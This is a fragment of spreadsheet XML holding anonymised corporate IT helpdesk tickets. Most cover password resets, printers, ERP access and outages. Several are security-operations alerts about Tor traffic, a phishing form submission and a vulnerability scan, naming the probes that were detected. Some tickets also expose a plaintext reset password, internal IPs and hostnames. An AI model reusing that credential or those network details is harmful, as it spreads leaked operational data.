  <si>
    <t>material issue</t>
  </si>
  <si>
    <t xml:space="preserve">now, the quantity changed to 3pcs, seems not solved yet.
rofgtyger liugh 
from: judthti zhu 
sent: friday, august 26, 2016 2:48 pm
to: nwfodmhc exurcwkm
cc: rofgtyger liugh 
subject: material issue
dear teamï¼Œ
we once shipped a subcontract order on jul 21th,
po#5616690206
rough material#2224208*10pcs
movement type:541
but its corresponding end product mm#6004236 still exists in erp,pls. help to check the root cause,thx!
b.rgds
judthtihty.zhuyhts
company hardpoint apac-wgq dc
</t>
  </si>
  <si>
    <t>request in behalf of jvxtfhkg heptuizn</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ecwtrjnq.jpecxuty@gmail.com_x000D_
_x000D_
hello collegues,_x000D_
_x000D_
jvxtfhkg heptuizns iphone calendar is only synchronizing in one direction._x000D_
_x000D_
if he does a calendar entry in his outlook on the computer, it synchs tot he iphone calendar,_x000D_
if he enters one on the iphone, it is not synchronized to the outlook._x000D_
_x000D_
would you please be so kind and help us regarding this issue._x000D_
_x000D_
many </t>
  </si>
  <si>
    <t xml:space="preserve">pagthyuathy afghtyjith - access to dot kt folders (\\HostName_29) </t>
  </si>
  <si>
    <t xml:space="preserve">hi,_x000D_
_x000D_
kindly usa access to  pagthyuathy afghtyjith  our new intern of dot net team._x000D_
her userid is "vvdfgtyuji"._x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_30hotf failed in job_scheduler at: 09/02/2016 00:51:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_30hotf failed in job_scheduler at: 09/02/2016 00:51:00</t>
  </si>
  <si>
    <t>reset passwords for qycgdfhz iqshzdru using password_management_tool password reset.</t>
  </si>
  <si>
    <t>access for tablearu-top customers</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ufesrwmz.egujslwx@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
to prepare for monthly inf mbr report, i need access to run top customer &amp;end markhtyets in reporting_tool,  it will be put in month inf mbr report. it is quite urgent now._x000D_
#/site/certified_content/views/mbrreporting_engineering_tool/topcustomersendmarkhtyets?:iid=1&lt;_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>ufesrwmz egujslwx</t>
  </si>
  <si>
    <t>configure e6430 unit for standard login for product videos display</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: kbclinop.vsczklfp@gmail.com_x000D_
_x000D_
hi,_x000D_
for your information and reference only.  i have requested help from it to set up a standard login for a spare laptop for company product videos to be display on tv â€“ at our office main entrance._x000D_
configuration completed by sridhar._x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">printer problem / issue information </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</si>
  <si>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prtor00u on HostName_1224 - prtor003 on HostName_1224 - prtor0040 on HostName_1224 _x000D_
 _x000D_
   â€¢  detailed description of the problem ?  will not print because drviers need updated - i updated the drivers but it states error processing _x000D_
_x000D_
   â€¢  type of documents not printing?  (email â€“ excel â€“ wordâ€¦etc)  all_x000D_
      (inwarehouse_tool â€“ delivery note â€“ production orderâ€¦etc)_x000D_
_x000D_
   â€¢  what system or application being used at time of the problem?      (ex windows / erp /kls)   outlook_x000D_
_x000D_
   â€¢  if not printing at all, does it respond to a ping command on the network and has a power cycle of the printer been completed? no_x000D_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</si>
  <si>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mfixrouy dyifhcjt</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_38hotf failed in job_scheduler at: 09/01/2016 22:20:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_38hotf failed in job_scheduler at: 09/01/2016 22:20:00</t>
  </si>
  <si>
    <t>ie æµè§ˆå™¨ä¸»é¡µè¢«æ›´æ”¹ä¸ºé…’åº—ç½‘ç«™åœ°å€ã€‚</t>
  </si>
  <si>
    <t>kcldufqe xghvrzoi</t>
  </si>
  <si>
    <t>recall:  ticket_no1547270 - i need to request access to co02 - change production order in cgo1 and plant_118.</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: riqmdnzs.mtlghwex@gmail.com_x000D_
_x000D_
riqmdnzs mtlghwex would like to recall the message, " ticket_no1547270 - i need to request access to co02 - change production order in cgo1 and plant_118."._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>é›»è…¦å‡ºç¾è—å±,ç„¡æ³•é–‹æ©Ÿ</t>
  </si>
  <si>
    <t>é€£vpnæ™‚,ç„¡æ³•é€£ä¸Šå¾Œ,é‡è©¦å¾Œ,çªç„¶å‡ºç¾è—å±,ç„¡æ³•é–‹æ©Ÿ</t>
  </si>
  <si>
    <t>spam</t>
  </si>
  <si>
    <t xml:space="preserve">-----original message-----_x000D_
from: nwfodmhc exurcwkm _x000D_
sent: friday, september 02, 2016 7:30 am_x000D_
to: umzcxfah aoshpjiu_x000D_
subject: re: new warehouse_toolmail from (806) 290-5218 at 7:35 am_x000D_
_x000D_
hi marry,_x000D_
_x000D_
it looks like a spam mail. you can go ahead and delete it._x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>no access to impact award hub</t>
  </si>
  <si>
    <t>the users do not have accees to impact award hub:  parfgtkym, leegtysm</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_2063d failed in job_scheduler at: 09/01/2016 18:24:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_2063d failed in job_scheduler at: 09/01/2016 18:24:00</t>
  </si>
  <si>
    <t xml:space="preserve">llvw8411311  shop floor / print station  </t>
  </si>
  <si>
    <t xml:space="preserve">noise coming from cpu that sounds like a cooling fan or a hard drive going bad.  machine located by the ultra's and wendt.
contact # 615  </t>
  </si>
  <si>
    <t>jiclynfv gwvzxdcj</t>
  </si>
  <si>
    <t>rebate agreements 92 will not create partial settlement</t>
  </si>
  <si>
    <t>rebate agreements 92 will not create a partial settlement with transaction vb(7 _x000D_
_x000D_
i have confirmed with agreement 92 specifically that there were sales during the month of august.  other agreements are working to create the credit without fail.  please advise what could be the cause and steps to correct.  please also note this same process worked to generate the july documents .</t>
  </si>
  <si>
    <t>doing engineering_tool advance search materials out of the group i select come up in results</t>
  </si>
  <si>
    <t>i picked titanium tial 6 4v but then p5 materials come up in results along with titanium, and s3 materials. i also had the kcu40 grade in the grade field, as i was doing a search for drilling</t>
  </si>
  <si>
    <t>all my files in collaboration_platform have dierppeared!</t>
  </si>
  <si>
    <t xml:space="preserve">ic
 welcome, our next available agent will be with you shortly...
 interaction alerting agent.
 website visitor has joined the conversation
rakthyesh ramdntythanjesh
 hi craigfgh
arjpdohf mrqwdtil
 hi
rakthyesh ramdntythanjesh
 </t>
  </si>
  <si>
    <t>re: sql quote - company internal project (agathon machines)</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: xzwlnbfo.plstfydx@gmail.com_x000D_
_x000D_
hi...can i get an update on this?_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>xzwlnbfo plstfydx</t>
  </si>
  <si>
    <t>when trying to refresh a report, i am getting a pop up that says hana odbc driver not found.</t>
  </si>
  <si>
    <t>circuit outage: secondary node down on company-na-usa-usa-dmvpn-1921-rtr01.company.com since at 3:04 pm et on 09/01 s</t>
  </si>
  <si>
    <t>what type of outage:  _____network     __x___circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ____yes_____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   ____3:04 pm et on 09/01__________________x000D_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</si>
  <si>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dsw in22210104</t>
  </si>
  <si>
    <t>we are seeing your 10.16.4.16/isensor04.company.com device generating '52734 vid28367 tor ssl server certificate detected - inbound' alerts that occurred on 2016-07-15 at 13:26:58 for traffic (not blocked) from port 9001/tcp of 95.211.216.9/95.211.216.9 to port 54528/tcp of 41.29.63.92663 indicating that 95.211.216.9/95.211.216.9 is generating tor traffic._x000D_
 _x000D_
please note that, depending on the placement of isensor04.company.com/10.16.4.16, there is a possibility that eszl8111123/41.29.63.92663 is your nated host. if this is the case, please examine your nat logs to determine the true destination of this activity. if you do not wish to be alerted on these events, please let us know and we will automatically resolve these alerts when they're destined to your nated host._x000D_
 _x000D_
tor activity does not immediately indicate malicious activity, however the presence of anonymizing software should be investigated to determine if this is authorized or expected activity. tor activity indicates a possible policy violation which in turn could lead to a potential compromise. tor is being increasingly used by malware, therefore tor activity may also indicate a malware infection._x000D_
 _x000D_
we are escalating this incident to you via a medium priority ticket and  no phone call per our default handling policy.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1) full escalation for anonymous communication traffic (tor, etc.) alerts where the traffic was not blocked (explicit notification via a high priority ticket and phone call)_x000D_
2) automatically resolve anonymous communication traffic (tor, etc.) alerts where the traffic was not blocked to the portal (no explicit notification but events will be available for reporting purposes in the portal)_x000D_
 _x000D_
sincerely,_x000D_
dell  soc</t>
  </si>
  <si>
    <t xml:space="preserve">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877.
1) full escalation for related events (high priority ticket and a phone call).
2) autoresolve events to the portal (no explicit notification but events will be available for reporting purposes in the portal).
sincerely,
 ctoc
=========================
event data
=========================
event id: 304247119
event summary: [ipbl]: phishing form submit - outbound beshryulisted ip
occurrence count: 1
event count: 1
host and connection information
source ip: 10.38.93.30
source hostname: dane-williuthyr
source mac address: 28:5a:eb:51:db:f0
destination ip: 107.180.41.85
destination hostname: ip-107-180-41-85.ip.secureserver.net.
destination ip geolocation: schtrtgoyhtsdale, usa
connection directionality: outgoing
device information
device ip: 18.79.63.203
device name: company-internal-asa.company.com-1
scwx event processing information
sherlock rule id (sle): 701525
inspector event id: 031724385
agent id: 103611
event detail:
aug 8 13:11:36 18.79.63.203 %asa-6-302013: built outbound tcp connection 2173940377 for outside:107.180.41.85/80 (107.180.41.85/80) to inside:10.38.93.30/58345 (12.161.199.50/14084)
[correlation_data]
aug 8 06:46:44 27.38.93.278 dhcpd[2261]: dhcpack on 10.38.93.30 to 28:5a:eb:51:db:f0 (dane-williuthyr) via eth1 relay 10.38.92.1 lease-duration 604800 (renew)
take action
ticket action:
</t>
  </si>
  <si>
    <t>skype on the m.curhetyu rack pc is not working, not allowing me to connect but seems to work for others.</t>
  </si>
  <si>
    <t>dsw in22457494</t>
  </si>
  <si>
    <t xml:space="preserve">dsw in33568505_x000D_
_x000D_
we are seeing your 172.20.10.208/isensor02.company.com device generating '49305 vid1029 openvas vulnerability scanner user-agent detected (inbound)' alerts for allowed traffic from port 55829/tcp of 198.8.80.219 to port 80/tcp of 30.28.15.015/30.28.15.015. this traffic indicates that 198.8.80.219 is using the openvas scanner, as indicated in the event details, against 30.28.15.015/30.28.15.015._x000D_
_x000D_
blocking each source ip address may not necessarily be productive due to attackers' ability to switch ip addresses through the use of proxies, anonymizing software such as tor, and vpns. please investigate the targeted host to determine whether you are running a vulnerable version of the application being targeted. _x000D_
_x000D_
this ticket will effectively serve as a master ticket for any related alerts until we receive feedback from you on how to handle these events going forward. please let us know either by corresponding to us via this ticket and delegating the ticket back to the soc, or by calling us at 877. we have a number of options available for the handling of future alerts such as this one:_x000D_
_x000D_
1) autoresolve these alerts directly to the portal (no explicit notification and events will be available for reporting purposes in the portal)._x000D_
2) ticket only escalation via a medium priority ticket (no phone call) for each unique source ip address for these alerts._x000D_
3) full escalation via a high priority ticket and a phone call for each unique source ip address. _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>possible vulnerability scan from host.my-tss.com (198.8.80.219) on isensplant_247 (dmz)</t>
  </si>
  <si>
    <t xml:space="preserve">dsw in33568733_x000D_
_x000D_
we are seeing your 208.211.136.207/isensplant_247.company.com device generating '[o]: possible scan [696363]' alerts for traffic (not blocked) from host/198.8.80.219, indicating that it may be performing a vulnerability scan. _x000D_
_x000D_
we are escalating this incident to you via a high priority ticket and phone call per your prior request.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for vulnerability scan alerts (explicit notification via a medium priority ticket and (no phone call))_x000D_
2) automatically resolve vulnerability scan alerts directly to the portal (no explicit notification but events will be available for reporting purposes in the portal)_x000D_
_x000D_
_x000D_
event data_x000D_
=========================_x000D_
related events: _x000D_
event id: 43478312_x000D_
event summary: [o]: possible scan [696363]_x000D_
occurrence count: 52_x000D_
event count: 1_x000D_
_x000D_
host and connection information_x000D_
source ip: 198.8.80.219_x000D_
source hostname: host.my-tss.com._x000D_
source port: 56260_x000D_
source ip geolocation: tarzana, usa_x000D_
destination port: 80_x000D_
destination ip geolocation: usa, usa_x000D_
connection directionality: incoming_x000D_
http method: get_x000D_
host: 208.211.136.164_x000D_
full url path: /global.asa_x000D_
_x000D_
device information_x000D_
device ip: 208.211.136.207_x000D_
device name: isensplant_247.company.com_x000D_
log time: 2016-08-10 at 19:14:58 utc_x000D_
action: not blocked_x000D_
vendor eventid: 524719_x000D_
cvss score: -1 _x000D_
vendor priority: 3_x000D_
vendor version: 7_x000D_
vendor reference: vid, 1009_x000D_
_x000D_
scwx event processing information_x000D_
sherlock rule id (sle): 896059_x000D_
observation rule id (ile): 696363_x000D_
inspector event id: 61816560_x000D_
ontology id: 200020003203718788_x000D_
event type id: 200020003203017106_x000D_
agent id: 102989_x000D_
_x000D_
event detail:_x000D_
this event indicates a single source generating 3 or more event summaries with a total of 50 or more occurrences in a 10 minute window. _x000D_
occ     time        source              destination         summary_x000D_
1       19:15:34    198.8.80.219        208.211.136.164     5799 vid1009 fx-scanner global.asa sourcecode access attempt (inbound)_x000D_
1       19:15:43    198.8.80.219        30.28.15.015        5799 vid1009 fx-scanner global.asa sourcecode access attempt (inbound)_x000D_
20      19:19:50    198.8.80.219        208.211.136.164     50713 viSID_26475 http post with phpinfo() (inbound)_x000D_
20      19:19:58    198.8.80.219        30.28.15.015        50713 viSID_26475 http post with phpinfo() (inbound)_x000D_
5       19:23:12    198.8.80.219        30.28.15.015        36613 vid12927 generirtc http header xss inbound_x000D_
5       19:23:32    198.8.80.219        208.211.136.164     36613 vid12927 generirtc http header xss inbound_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">nmpworvu upgtrvnj // monitor display issue </t>
  </si>
  <si>
    <t>password chaning for window (company)</t>
  </si>
  <si>
    <t>xtsuifdz wktgzcyl</t>
  </si>
  <si>
    <t>connect to the network the pc's in the inspection room</t>
  </si>
  <si>
    <t>can you look in to getting the 2 pc's on to the network in the inspection room off of dept 48?  it would be nice to be able to share some images from the pc.</t>
  </si>
  <si>
    <t>huqvpyli ucrtkvyl</t>
  </si>
  <si>
    <t>umkrenhp beldshqc</t>
  </si>
  <si>
    <t>inquiry for hr_tool site single sign on</t>
  </si>
  <si>
    <t>qctdugsi bfqlgvos</t>
  </si>
  <si>
    <t>high priority-laptop monitor gone bad, unable to see screen, its completely beshryu</t>
  </si>
  <si>
    <t>please give high priority since user is traveling from monday.
service tag-37q3p32
ph--574</t>
  </si>
  <si>
    <t>need keybankrd in system tray and need picture of keybankrd too.</t>
  </si>
  <si>
    <t xml:space="preserve">need keybankrd in system tray and need picture of keybankrd too.
helped user enabling keybankrd at system tray with preferred language but couldn't set up picture for it.
hence as per user request assigning it to local it.
contact # ; 393
</t>
  </si>
  <si>
    <t>ravgfnqp gizaudke</t>
  </si>
  <si>
    <t xml:space="preserve">  internal power supply - on   company-eu-deu-germany-e-b2-f2-new-office-3550-access-sw01 (68.20.26.7986) is showing faulty_x000D_
_x000D_
company-eu-deu-germany-e-b2-f2-new-&gt;sh env all_x000D_
fan is ok_x000D_
temperature is ok_x000D_
power is faulty_x000D_
rps is not present_x000D_
</t>
  </si>
  <si>
    <t>unable to log in to hub/ess portal</t>
  </si>
  <si>
    <t>tfbvqliw xrqimykt</t>
  </si>
  <si>
    <t xml:space="preserve">engineering_tool issue </t>
  </si>
  <si>
    <t>erp account for haunm keeps locking up, can you unlock please. SID_34</t>
  </si>
  <si>
    <t>lipcoebu eyadxbif</t>
  </si>
  <si>
    <t xml:space="preserve">engineering_tool issue and zdsxmcwu thdjzolwronization </t>
  </si>
  <si>
    <t xml:space="preserve">request for company.com email address. </t>
  </si>
  <si>
    <t xml:space="preserve">from: jertyur hanna _x000D_
sent: thursday, september 01, 2016 8:02 pm_x000D_
to: efbwiadp dicafxhv_x000D_
subject: re: company email address request from sqmabtwn fchijage _x000D_
_x000D_
approved._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>fljhvdsn kiyzclao</t>
  </si>
  <si>
    <t>reset my password to daypay3 - SID_51</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: bqjvxsaf.aupdonjy@gmail.com_x000D_
_x000D_
reset my password to daypay3 - SID_51_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>hanna report access</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: muywpnof.prtikusy@gmail.com_x000D_
_x000D_
hello,_x000D_
                i seem to have lost my access to hanna reports.  when in go in to analysis for excel it takes me into the general excel menu and when i choose a new sheet, the analysis tab is missing.  do i need to do something to get access to this back?_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">ie went to not legitmate website </t>
  </si>
  <si>
    <t xml:space="preserve">814-
summary:on internet.  pop-up with reported microsoft registry failure of operating system.
</t>
  </si>
  <si>
    <t>die synchronisierung mit exchange activesync</t>
  </si>
  <si>
    <t>gferjcsh apqwniyr</t>
  </si>
  <si>
    <t>skype audio does not work.</t>
  </si>
  <si>
    <t>inc1541133 - ticket update</t>
  </si>
  <si>
    <t>network outage: usa mi site is hard down at 9:29 am et on 09/01. there is no backup circuit.</t>
  </si>
  <si>
    <t>what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ____no_____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   _______9:29 am et on 09/01_______________x000D_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____na_______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</si>
  <si>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 xml:space="preserve">when sending emails from w-corp-ebusiness.service the sent emails show up in my personal sent folder </t>
  </si>
  <si>
    <t xml:space="preserve">contact # : 803
summary: when sending emails from w-corp-ebusiness.service the sent emails show up in my personal sent folder and not in the ebusiness sent folder.
it does this for all users in the company ebusiness email box
</t>
  </si>
  <si>
    <t>av system usa</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: gdkiehbr.kdithjsr@gmail.com_x000D_
_x000D_
please provide it support for the uacyltoe hxgayczeing on the new av system in the main training room in usa. we need to uacyltoe hxgaycze the system to complete the finial sign off for the vendor._x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>ie not working.</t>
  </si>
  <si>
    <t>esfiuwcp pkaqnret</t>
  </si>
  <si>
    <t>hard disk failure on esxi host atjsv001</t>
  </si>
  <si>
    <t>HostName_108(kirty - plm conversion - production): disk free on e:\ is now 3%.</t>
  </si>
  <si>
    <t>log on balancing error ; even after connecting to vpn</t>
  </si>
  <si>
    <t>urkwvedc qcibogpt</t>
  </si>
  <si>
    <t>email will not open</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: wxnetroc.yecbmliq@gmail.com
desktop email will not open.
wxnetroc yecbmliq
252
sent from my ipad
</t>
  </si>
  <si>
    <t>wxnetroc yecbmliq</t>
  </si>
  <si>
    <t>ms office upgrade ;  from 2013 to 2016</t>
  </si>
  <si>
    <t>outlook issue slow</t>
  </si>
  <si>
    <t>outlook running slow.</t>
  </si>
  <si>
    <t>network outage:  india site is down at 9:00 am et on 09/01. no backup circuit.</t>
  </si>
  <si>
    <t>what type of outage:  _____network     ___x__circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ______no___     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   _________9:00 am et on 09/01_____________x000D_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____na____     (yes/no/na) _x000D_
_x000D_
7. site contact notified (phone/email) ?  _________     (yes/no/na) _x000D_
_x000D_
8. remote dial-in ?   ____na_______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</si>
  <si>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printer driver installation</t>
  </si>
  <si>
    <t>name:rohntyub dfhtyuison
language:
browser:microsoft internet explorer
email:zstkagwu.jlyrhdcf@gmail.com
customer number:
telephone:83
summary:hello, i am having issues printing to my regular printer. i get an error saying "no pages selected" and sometimes i am prompted to download a new driver.</t>
  </si>
  <si>
    <t>po - a4 4505633620</t>
  </si>
  <si>
    <t xml:space="preserve">hello  it,_x000D_
_x000D_
there are 3 item linked with the finished materials  7302795, but only one time is showed in po. please help check it, </t>
  </si>
  <si>
    <t>the zcor0003 report will not work.  this is critical to the financial close.</t>
  </si>
  <si>
    <t xml:space="preserve">the transaction report zcor0003 when ran is producing no data.  this is a sa38 report.  this is critical to the financial close._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve"> password reset does not work in iehs (ticket_no1546057)</t>
  </si>
  <si>
    <t xml:space="preserve">from: aorthyme rnsuipbk 
sent: thursday, september 01, 2016 6:38 pm
to: 'iehshelpdesk.us@anteagroup.com'
cc: ndkrcxjb hpormqtx; ugyothfz ugrmkdhx
subject: password reset does not work in iehs (ticket_no1546057)
hello,
mr. roesshnktler is having trouble to reset his password in 
whenever he is trying to reset the password, it says that 'your password has been sent to the provided email address'. but he does not receive any password in his mail.
we have checked and rightly put the email address.
please help.
</t>
  </si>
  <si>
    <t>ndkrcxjb hpormqtx</t>
  </si>
  <si>
    <t>plm</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: grkaqnzu.mldekqpi@gmail.com
hallo,
fÃ¼r unsere neuen azubis
hspgxeit prwiqjto (diehfhyumj)
und
hdmwolxq xqbevoic (bhdikthyu)
wird noch die plm-berechtigung benÃ¶tigt.
mit freundlichen grÃ¼ÃŸen,
with best </t>
  </si>
  <si>
    <t>grkaqnzu mldekqpi</t>
  </si>
  <si>
    <t>please reactivate account for user : vvsimpj till 31st october 2016</t>
  </si>
  <si>
    <t>gidpowxt mpdyvsrt</t>
  </si>
  <si>
    <t>.7z file can't be opened.</t>
  </si>
  <si>
    <t>erirtc wants to see an archived mail from a particular date.</t>
  </si>
  <si>
    <t>business_client is not working</t>
  </si>
  <si>
    <t>i cannot start the business_client anymore, see screenshot attached.</t>
  </si>
  <si>
    <t>one team update</t>
  </si>
  <si>
    <t>hr_tool - user is not able to import employee data // ooo till 5th sept</t>
  </si>
  <si>
    <t>user: ehidbxam.rnupoxeq@gmail.com_x000D_
issue: user is not able to import data to portal - please find attached mail.</t>
  </si>
  <si>
    <t>ehidbxam rnupoxeq</t>
  </si>
  <si>
    <t>erp SID_34 and SID_21 unlock and password reset.</t>
  </si>
  <si>
    <t>licwu3 unlock</t>
  </si>
  <si>
    <t>dnc430 unlock</t>
  </si>
  <si>
    <t>relvzfnc nqksogtm</t>
  </si>
  <si>
    <t>user called to reset password, account is disabled in ad : bmwtqxns.fcrqkhix@gmail.com</t>
  </si>
  <si>
    <t>erp password reset , erp SID_34</t>
  </si>
  <si>
    <t>monitor resolution issue</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: zjawqgcs.tohqcxla@gmail.com
hi there,
i changed to a large monitor, but the screen resolution is not right. i want to change to 1900x1200, but got error message like this "the current input timing is not supported by the monitor display. please change your input timing to 1920x1080@60hz or any other monitor listed timing as per the monitor specifications"
can you help me out please?
</t>
  </si>
  <si>
    <t>zjawqgcs tohqcxla</t>
  </si>
  <si>
    <t>email not working</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: zjawqgcs.tohqcxla@gmail.com_x000D_
_x000D_
hi there,_x000D_
_x000D_
_x000D_
i tried to use  my email but it still shows loading after 30 mins. i have use the web-based office to check email._x000D_
_x000D_
can you help to fix that? </t>
  </si>
  <si>
    <t xml:space="preserve">vip 2 - can not sign in </t>
  </si>
  <si>
    <t xml:space="preserve">
received from: oxrnpuys.oxizkwmq@gmail.com
i cannot sign in
alexgnhtjunder
[cid:image001.jpg@01d20453.21c570f0]
[cid:image002.jpg@01d20453.21c570f0]
best </t>
  </si>
  <si>
    <t>oxrnpuys oxizkwmq</t>
  </si>
  <si>
    <t>please assist erp log on need to be reset. not sure why but cant log on.</t>
  </si>
  <si>
    <t>please assist, symantec questions and answers.</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: gvderpbx.udrzjxkm@gmail.com
[cid:image001.jpg@01d20451.9d7b95f0]
gvderpbx udrzjxkm
junior application sales engineer
gvderpbx.udrzjxkm@gmail.com&lt;mailto:gvderpbx.udrzjxkm@gmail.com&gt;
</t>
  </si>
  <si>
    <t>ad locked out</t>
  </si>
  <si>
    <t>ad locked out : password reset through password_management_tool password manager.</t>
  </si>
  <si>
    <t>lwyghvsc erftxsny</t>
  </si>
  <si>
    <t>quality certificate abode form over lapping</t>
  </si>
  <si>
    <t>quality certificate abode form over lapping in one page. can u rectify it in page 1 and page2. _x000D_
i have attached one example form for your reference.</t>
  </si>
  <si>
    <t>sxkfbnaw ktbfuiah</t>
  </si>
  <si>
    <t>circuit outage : apac,apac-dmvpn circuit is down at 5:13 am et on 09/01. site is up on primary circuit.</t>
  </si>
  <si>
    <t>what type of outage:  _____network     _x____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ____slo site_____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   ________ 5:13 am et on 09/01______________x000D_
_x000D_
3.  scheduled maintenance ( power) ? ____no___    (yes/no/na)     company power  _________     provider power __________x000D_
                _x000D_
4.  scheduled maintenance ( network) ? __no_x000D_
7. site contact notified (phone/email) ?  _________     (yes/no/na) _x000D_
_x000D_
8. remote dial-in ?   ________na___   (yes/no/na) _x000D_
_x000D_
9. equipment reset ?    _____na______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</si>
  <si>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_x000D_
_x000D_
received from: vfyuldps.kjgcaphx@gmail.com_x000D_
_x000D_
hi, dear sir/madam_x000D_
_x000D_
i ask your help for the erp pr process._x000D_
_x000D_
i went to erp inbox from workflow system. keep pop up the screen below even i just accessed 10 sec._x000D_
please kindly check and fix._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>vfyuldps kjgcaphx</t>
  </si>
  <si>
    <t xml:space="preserve">hi,
i changed the password through password_management_tool, and now unable to lonin to engineering tool
pls help
jayhrt bhatyr
extn393
</t>
  </si>
  <si>
    <t>probleme mit erpgui \ ewewx212495 \vzqomdgt jwoqbuml</t>
  </si>
  <si>
    <t>probleme mit erpgui \ ewewx212493 \vzqomdgt jwoqbuml</t>
  </si>
  <si>
    <t>laptop not chatryung from doc station</t>
  </si>
  <si>
    <t>when connected the laptop to doc station its not charging battery</t>
  </si>
  <si>
    <t>outlook is continuously asking for password.</t>
  </si>
  <si>
    <t>psrqxzmn qbefohdl</t>
  </si>
  <si>
    <t xml:space="preserve">printer configuration </t>
  </si>
  <si>
    <t>printer configuration 
0774
summary:i need to configure printer in t10 region, kindly help to do the same
ricoh aficio mp 2000 pcl16
ii02</t>
  </si>
  <si>
    <t>konto neu erstellen : ewew8323504 und ewew7212495</t>
  </si>
  <si>
    <t xml:space="preserve">ewew8323504 optiplex 780 lager hr.darda_x000D_
ewew8323506 optiplex 780 lager hr.darda_x000D_
</t>
  </si>
  <si>
    <t>telefonanlage - nebenstelle 20 auf wild marfhtyio umprogramdntymieren!</t>
  </si>
  <si>
    <t>yaskgmoc nzriogja</t>
  </si>
  <si>
    <t>erp gui has be installed</t>
  </si>
  <si>
    <t>software not working on laptop - engineering_tool - outlook - internet explorer. had a security warning and all have stopped perform</t>
  </si>
  <si>
    <t>had a firewall warning and software stopped working.</t>
  </si>
  <si>
    <t>vebizknu qlknijvb</t>
  </si>
  <si>
    <t>outlook ä¸èƒ½å¯åŠ¨ã€‚</t>
  </si>
  <si>
    <t>ebkmczgy pbzfgcoa</t>
  </si>
  <si>
    <t>engineering_tool and engineering_tool not working</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: cugjzqlf.djwbyact@gmail.com
hello
my system is facing an issues while connecting engineering_tool and engineering_tool software, below is the erro message:
1.       engineering_tool
[cid:image001.png@01d20452.3d767b10]
2.       for engineering_tool
[cid:image002.png@01d20452.3d767b10]
please support
cugjzqlf djwbyact
executive sales.
company india ltd
mob â€“ 9128mail : cugjzqlf.djwbyact@gmail.com&lt;mailto:cugjzqlf.djwbyact@gmail.com&gt;
</t>
  </si>
  <si>
    <t>probleme mit etiketten drucken \laser 01 \we_wu102 \pfjwinbg ljtzbdqg</t>
  </si>
  <si>
    <t>probleme mit etiketten drucken \laser 03 \we_wu102 \pfjwinbg ljtzbdqg</t>
  </si>
  <si>
    <t>setup new ws \rechner instandsetzung \qnigujek kopqcjdh</t>
  </si>
  <si>
    <t>qnigujek kopqcjdh</t>
  </si>
  <si>
    <t>webshop access.</t>
  </si>
  <si>
    <t xml:space="preserve">hello,_x000D_
i didn't see my customers at webshop (distributor_tool). also i cann't chose any salesorg. _x000D_
i have unlocked all my accounts and change the password, but the problem remains._x000D_
</t>
  </si>
  <si>
    <t>jzfboqgc zhmqwxgd</t>
  </si>
  <si>
    <t>erp error</t>
  </si>
  <si>
    <t xml:space="preserve">hi team, i am experiencing some error in erp SID_34 application. firstly i am not certain whether i am accessing SID_34 system or not. i have logged into netweaver 5.0 in my system. is this the correct application i should be using? please find attachment that can give a glimpse of the error. feel free to chat or email or phone call with me to understand more on this. </t>
  </si>
  <si>
    <t xml:space="preserve">job hr_toolmforrun failed in job_scheduler at: 09/01/2016 02:37:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job hr_toolmforrun failed in job_scheduler at: 09/01/2016 02:37:00</t>
  </si>
  <si>
    <t>please reset users password to daypay3</t>
  </si>
  <si>
    <t>install new optiplex 7020 as eagw8111311 - fy17 x64 company image</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ubdihsop.ahyeqpmx@gmail.com_x000D_
_x000D_
hi,_x000D_
_x000D_
will you please help me to logon to erp._x000D_
_x000D_
it doesn't want to accept my password._x000D_
_x000D_
i think i need to put in new password??_x000D_
_x000D_
kind </t>
  </si>
  <si>
